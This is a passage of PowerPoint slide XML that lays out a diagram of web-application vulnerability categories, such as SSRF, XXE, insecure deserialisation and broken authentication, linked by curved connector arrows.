                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{210C9ABB-5DD0-E3BD-F259-10E547736DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="370080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8" name="CustomShape 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC9FBD2E-4DD3-8FA4-1FEE-C8CDC9DFCD78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485720" y="3700800"/>
            <a:ext cx="93060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Info Leakage &amp; Improper Error Handling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9" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{527A8C59-AD25-6E8F-E2F2-08C4D1AA6BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="369324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Security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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0" err="1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0" name="CustomShape 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D34757-E932-9170-B578-671808ACD7B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="370080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Sensitive Data Exposure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1" name="CustomShape 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B493A8AD-64A0-92AF-5629-E2D4EC922758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="3700800"/>
            <a:ext cx="924480" cy="4186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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Vulnerable &amp; outdated components</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="9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2" name="CustomShape 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC6C13F-65DD-F4C2-A797-BA7905BEB908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216360" y="4196880"/>
            <a:ext cx="95724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Improper Error Handling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3" name="CustomShape 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F441839C-4F56-1B8D-1765-23E22B5A1D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="419688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Broken Auth. &amp; Session Mngt.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4" name="CustomShape 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B16A1DB-8438-775B-D0B7-8C591C3258DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2766240" y="4187880"/>
            <a:ext cx="9291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Insecure Cryptographic Storage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5" name="CustomShape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4475A7-5FD1-E3C1-BB35-84E2B2FE0547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="419688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6" name="CustomShape 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36287F61-53E3-8E32-5F4E-90EF8E7B62BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="419688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Missing function level access control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7" name="CustomShape 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24EC6A5B-0236-12AE-A3B4-DFB9A7EDF17E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="419688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Identification &amp; Authentication Failures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8" name="CustomShape 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90878C13-6BDB-F620-BF14-841B37727BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="469332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Insecure Storage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9" name="CustomShape 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1AFC3D2-E96F-811E-5679-B8444D0DADA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="469332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Insecure Cryptographic Storage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30" name="CustomShape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1EE93AA-B559-72E8-088A-1FE774A04630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="468252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Failure to restrict URL access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31" name="CustomShape 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0840C1EF-2EB9-0442-6E92-114DA295DE45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="469332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Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" strike="noStrike" spc="-1" dirty="0" err="1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Deserialisation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32" name="CustomShape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F00E6BE7-0E44-49D8-5124-7A29C3A5043E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21567600">
            <a:off x="238320" y="518940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Denial of Service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33" name="CustomShape 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FD7CE3-53DE-181B-C5EE-4D36C35263E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="518940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Insecure</a:t>
            </a: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 Communication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4" name="CustomShape 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C13048A4-B6D1-BD4F-CD5D-E0CF1D4F670E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="517716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Transport Layer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5" name="CustomShape 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB411A4-43DA-C9EC-0449-C4E9EEF4117D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="5189400"/>
            <a:ext cx="925920" cy="4186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Components with known vulnerabilities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6" name="CustomShape 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D10AAEE-5D18-5B96-6023-8FBD71D355CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="5189400"/>
            <a:ext cx="927720" cy="4186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Components with known vulnerabilities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7" name="CustomShape 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81343466-62CD-E128-22F4-7785431A6F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="518940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Yu Mincho Demibold"/>
              </a:rPr>
              <a:t>Insufficient Logging &amp; Monitoring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38" name="CustomShape 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB7A78D-C32E-249B-719F-F5B8D21753DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238680" y="568548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solidFill>
              <a:srgbClr val="FFD8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Insecure Config.  Management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39" name="CustomShape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8239273-16F2-C06E-0E06-F029603F0410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485360" y="568548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Failure to restrict URL access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0" name="CustomShape 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E6B3971-7D28-AAF7-4AF7-3815BEEAE272}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2765880" y="567180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Unvalidated Redirects and Forwards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1" name="CustomShape 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2C175C-08E6-F417-5A47-7B0D7705F19E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325840" y="568548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Insufficient Logging &amp; Monitoring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2" name="CustomShape 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E85555D-9D29-FE8A-A276-A3ADF99D1985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038840" y="568548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Unvalidated Redirects and Forwards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3" name="CustomShape 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D039D94-543B-AAC6-00B8-B4DF23006A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6593400" y="568548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SSRF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4" name="CustomShape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F58C7D3-00B4-2DDF-99D9-8A5FF891B2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5339520" y="271152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XXE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5" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96B364AC-8939-971D-764E-EE79116BEE0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038120" y="320472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6" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168A7CC9-0975-8485-9C3E-7F898F260303}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5324040" y="370080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7" name="CustomShape 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9415800C-6D70-2225-58F0-F78EF4ED7E77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590880" y="320472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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1249" name="Connector: Curved 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB5689C9-B531-51F0-F792-387A95456618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1193" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="99216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50" name="Connector: Curved 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F20B71BA-9F88-BFA1-5915-BFC8F64046B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1206" idx="3"/>
            <a:endCxn id="1225" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 50009"/>
              <a:gd name="adj3" fmla="val 49899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51" name="Connector: Curved 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F87E898-97C9-2442-306A-5C4AEEF92BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1225" idx="3"/>
            <a:endCxn id="1207" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="2421540"/>
            <a:ext cx="341640" cy="19846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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1252" name="Connector: Curved 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD2B89A-42FA-E257-6162-AB3513DD976F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1198" idx="3"/>
            <a:endCxn id="1206" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695400" y="1924020"/>
            <a:ext cx="343440" cy="49752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53" name="Connector: Curved 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21043EC4-1714-F0C0-021F-C1DFC13B896F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1191" idx="3"/>
            <a:endCxn id="1198" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416680" y="1429380"/>
            <a:ext cx="349200" cy="49464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54" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D5BA4D1-7027-7A54-9505-D007A974F50E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1229" idx="3"/>
            <a:endCxn id="1224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4397220"/>
            <a:ext cx="349560" cy="50544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55" name="Connector: Curved 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04565EE0-525C-9B53-0B06-F4336A523F59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1239" idx="3"/>
            <a:endCxn id="1230" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="4891860"/>
            <a:ext cx="349200" cy="100296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stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1257" name="Connector: Curved 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59AC195E-ABAE-9F7A-8192-842F199B20F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1202" idx="3"/>
            <a:endCxn id="1223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151640" y="2421540"/>
            <a:ext cx="333720" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30113"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1259" name="Connector: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7E5C77-9136-6BEE-726D-671C092F83FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1196" idx="3"/>
            <a:endCxn id="1209" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321120" cy="98784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0" name="Connector: Curved 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{121B56AB-7844-DFCE-A726-0EC8CD5E9472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1208" idx="3"/>
            <a:endCxn id="1191" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1429200"/>
            <a:ext cx="334080" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54045"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 4617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1" name="Connector: Curved 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E43A1748-A964-E702-79E7-F7287F5D812C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1217" idx="3"/>
            <a:endCxn id="1197" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="1925280"/>
            <a:ext cx="334080" cy="1985040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 56252"/>
              <a:gd name="adj2" fmla="val 49990"/>
              <a:gd name="adj3" fmla="val 54999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2" name="Connector: Curved 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA104F00-C152-32D1-A766-3240F7F8BAEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1238" idx="3"/>
            <a:endCxn id="1233" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="5398740"/>
            <a:ext cx="33372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3" name="Connector: Curved 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C710774-6792-9888-2927-58022AE860FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1223" idx="3"/>
            <a:endCxn id="1204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2416680" y="2418660"/>
            <a:ext cx="349200" cy="1987560"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33106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4" name="Connector: Curved 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B788D6B7-6E31-ACD3-9005-243963A9AC16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1226" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="99216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5" name="Connector: Curved 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7381742-5A96-0A5D-2201-F8ABA60ACB9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1220" idx="3"/>
            <a:endCxn id="1205" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="2421360"/>
            <a:ext cx="359640" cy="1488960"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50100"/>
              <a:gd name="adj2" fmla="val 49987"/>
              <a:gd name="adj3" fmla="val 49899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6" name="Connector: Curved 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC3A346-08F3-355C-49A2-93DBAB555422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1241" idx="3"/>
            <a:endCxn id="1237" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="5398740"/>
            <a:ext cx="34164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7" name="Straight Arrow Connector 91">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20CDDCBB-4B51-DCC0-E48B-C951D5E6D180}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647160" y="143370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8" name="Straight Arrow Connector 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4B4F43-2E21-67BE-2487-D63CD256A81E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914000" y="193464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9" name="Straight Arrow Connector 93">
            <a:extLst>
